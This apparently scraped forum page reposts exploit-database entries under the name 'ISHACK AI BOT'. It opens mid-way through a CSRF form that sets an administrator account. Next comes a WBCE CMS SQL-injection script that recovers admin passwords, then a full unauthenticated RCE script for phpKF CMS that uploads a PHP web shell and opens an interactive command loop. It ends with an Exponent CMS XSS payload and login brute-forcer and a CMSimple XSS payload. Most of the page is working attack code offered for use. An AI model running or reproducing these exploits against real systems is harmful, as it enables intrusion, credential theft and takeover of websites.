type="text" value="3" name="birthmonth[0]"></td></tr> <tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr> <tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr> <tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr> <tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr> <tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr> <tr><td>email[0]</td><td><input type="text" value="[email protected]" name="email[0]"></td></tr> <tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr> <tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr> <tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr> <tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr> <tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr> <tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr> </table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html>
  22. ISHACK AI BOT

    WBCE CMS 1.5.1 - Admin Password Reset

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset # Google Dork: intext: "Way Better Content Editing" # Date: 20/12/2021 # Exploit Author: citril or https://github.com/maxway2021 # Vendor Homepage: https://wbce.org/ # Software Link: https://wbce.org/de/downloads/ # Version: <= 1.5.1 # Tested on: Linux # CVE : CVE-2021-3817 # Github repo: https://github.com/WBCE/WBCE_CMS # Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75 import requests _url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment _domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature headers = { 'User-Agent': 'Mozilla/5.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'close' } _p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue" r = requests.post(url = _url, headers = headers, data = _p) if r.status_code == 200: print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')
  23. ISHACK AI BOT

    phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated) # Date: 18/12/2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://www.phpkf.com/ # Software Link: https://www.phpkf.com/indirme.php # Version: 3.00 # Category: Webapps # Tested on: Linux/Windows # phpKF-CMS; It is a very popular content management system for promotion, news, shopping, corporate, friends, blogs and more. # Contains an endpoint that allows remote access # Necessary checks are not made in the file upload mechanism, only the file extension is checked # The file with the extension ".png" can be uploaded and the extension can be changed. # Example: python3 exploit.py -u http://example.com # python3 exploit.py -u http://example.com -l admin -p Admin123 from bs4 import BeautifulSoup from time import sleep import requests import argparse import json def main(): parser = argparse.ArgumentParser(description='phpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)') parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=False) parser.add_argument('-p', '--password', type=str, required=False) args = parser.parse_args() print("\nphpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") host(args) def host(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") sleep(2) args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass else: print("\n[?] Check Adress...\n") sleep(2) args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass # Check Host Status try: response = requests.get(args.host) if response.status_code == 200: if args.login == None and args.password == None: create_user(args) else: login_user(args) else: print("[-] Address not reachable!") sleep(2) except requests.ConnectionError as exception: print("[-] Address not reachable!") sleep(2) exit(1) def create_user(args): print("[*] Create User!\n") sleep(2) url = args.host + "/phpkf-bilesenler/kayit_yap.php" headers = { "Origin": args.host, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Referer": "http://fuzzing.com/uye-kayit.php", "Accept-Encoding": "gzip, deflate" } data = { "kayit_yapildi_mi": "form_dolu", "oturum": '', "kullanici_adi": "evil", "sifre": "Evil123", "sifre2": "Evil123", "posta": "[email protected]", "kosul": "on" } response = requests.post(url, headers=headers, data=data, allow_redirects=True) args.login = ("evil") args.password = ("Evil123") print("[+] " + args.login + ":" + args.password + "\n") sleep(2) login_user(args) def login_user(args): url = args.host + "/uye-giris.php" headers = { "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/uye-giris.php", "Accept-Encoding": "gzip, deflate" } data = { "kayit_yapildi_mi": "form_dolu", "git": args.host + "/index.php", "kullanici_adi": args.login, "sifre": args.password, "hatirla": "on" } response = requests.post(url, headers=headers, data=data, allow_redirects=False) token = response.cookies.get("kullanici_kimlik") if (token != None): print("[!] Login Success!\n") sleep(2) upload_evil(args, token) else: if args.login == "evil" and args.password == "Evil123": print("[!] Unauthorized user!\n") print("[!] manually add a user and try again\n") print("[!] Go to link " + args.host + "/uye-kayit.php\n") print("python3 exploit.py -u '"+ args.host +"' -l 'attacker' -p 'p@ssW0rd'") sleep(2) else: print("[!] Unauthorized user!\n") sleep(2) def upload_evil(args, token): url = args.host + "/phpkf-bilesenler/yukleme/index.php" cookies = { "kullanici_kimlik": token, "dil": "en" } headers = { "VERICEK": "", "DOSYA-ADI": "evil.png", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Content-type": "application/x-www-form-urlencoded; charset=utf-8", "Accept": "*/*", "Origin": args.host, "Referer": args.host + "/oi_yaz.php", "Accept-Encoding": "gzip, deflate" } data = "<?php if(isset($_GET['cmd'])){ $cmd = ($_GET['cmd']); system($cmd); die; } ?>" response = requests.post(url, headers=headers, cookies=cookies, data=data) if (response.text == "yuklendi"): print("[!] Upload Success!\n") sleep(2) change_name(args, token) else: print("[!] Upload Failed!\n") sleep(2) def change_name(args, token): url = args.host + "/phpkf-bilesenler/yukleme/index.php" cookies = { "kullanici_kimlik": token, "dil": "en" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept": "*/*", "Origin": args.host, "Referer": args.host + "/oi_yaz.php", "Accept-Encoding": "gzip, deflate" } data = { "yenidenadlandir": "evil.png|evil.php", "vericek": "/" } response = requests.post(url, headers=headers, cookies=cookies, data=data) if (response.text == "Name successfully changed..."): print("[!] Change Name evil.php!\n") sleep(2) find_dict(args, token) else: print("[!] Change Failed!\n") sleep(2) def find_dict(args, token): url = args.host + "/phpkf-bilesenler/yukleme/index.php" cookies = { "kullanici_kimlik": token, "dil": "en" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept": "*/*", "Origin": args.host, "Referer": args.host + "/oi_yaz.php", "Accept-Encoding": "gzip, deflate" } data = { "vericek": "/", "dds": "0" } response = requests.post(url, headers=headers, cookies=cookies, data=data) if (response.text == "You can not upload files!"): print("[!] File not found!\n") sleep(2) else: print("[!] Find Vuln File!\n") sleep(2) soup = BeautifulSoup(response.text, 'html.parser') path = soup.find("div").contents[1].replace(" ", "") exploit(args, path) def exploit(args, path): print("[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + path + "evil.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main()
  24. ISHACK AI BOT

    Exponent CMS 2.6 - Multiple Vulnerabilities

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities # Exploit Author: heinjame # Date: 22/10/2021 # Exploit Author: picaro_o # Vendor Homepage: https://www.exponentcms.org/ # Version: <=2.6 # Tested on: Linux os *Stored XSS* Affected parameter = > http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title, Text Block) Payload = <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> ** *Database credential are disclosed in response *** POC ``` var adminerwindow = function (){ var win = window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms'); if (!win) { err(); } } ``` **Authentication Bruteforce* ``` import argparse import requests import sys parser = argparse.ArgumentParser() parser.add_argument("url", help="URL") parser.add_argument("Username list", help="Username List") parser.add_argument("Password list", help="Password List") pargs = parser.parse_args() host = sys.argv[1] userlist = sys.argv[2] passlist = sys.argv[3] try: readuser = open(userlist) readpass = open(passlist) except: print("Unable to load files") exit() def usernamebrute(): s = requests.Session() for username in readuser.readlines(): brute={ 'controller':(None,'users'), 'src':(None,''), 'int':(None,''), 'action':(None,'send_new_password'), 'username':(None,username.strip()), } bruteforce = s.post(host+"/index.php",files=brute) status = s.get(host+"/users/reset_password") if "administrator" in status.text: print("[+] Found username : "+ username) adminaccount = username checkpoint = True return adminaccount,checkpoint break def passwordbrute(adminaccount): s = requests.Session() s.cookies.set("csrftoken", "abc") header = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1', 'Referer': host+'/login/showlogin' } for password in readpass.readlines(): brute={ 'controller':'login', 'src':'', 'int':'', 'action':'login', 'username':adminaccount, 'password':password.strip() } bruteforce = s.post(host+"/index.php",headers=header,data=brute) # print(bruteforce.text) status = s.get(host+"/login/showlogin",cookies=csrf) print(status.text) if "Invalid Username / Password" not in status.text: print("[+] Found Password : "+ password) break adminaccount,checkpoint = usernamebrute() if checkpoint == True: passwordbrute(adminaccount) else: print("Can't find username,We can't proceed sorry :(") ```
  25. ISHACK AI BOT

    CMSimple 5.4 - Cross Site Scripting (XSS)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS) # Date: 22/10/2021 # Exploit Author: heinjame # Vendor Homepage: https://www.cmsimple.org/en/ # Software Link: https://www.cmsimple.org/en/?Downloads # Version: <=5.4 # Tested on: Linux os [Description] Since the application is filtering user input with preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding. So the application let's attacker perform DOM based XSS. [Payload and POC] File > images > Upload a file Attack vector >> ')-alert(1)// (need to encode)>> &#39;&#41;&#45;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#47;&#47; When the victim clicks the delete button,an alert will be executed. Script to encode the payload payload = input() finalpayload = "" for i in payload: finalpayload = finalpayload + "&#" + str(ord(i)) + ";" print(finalpayload)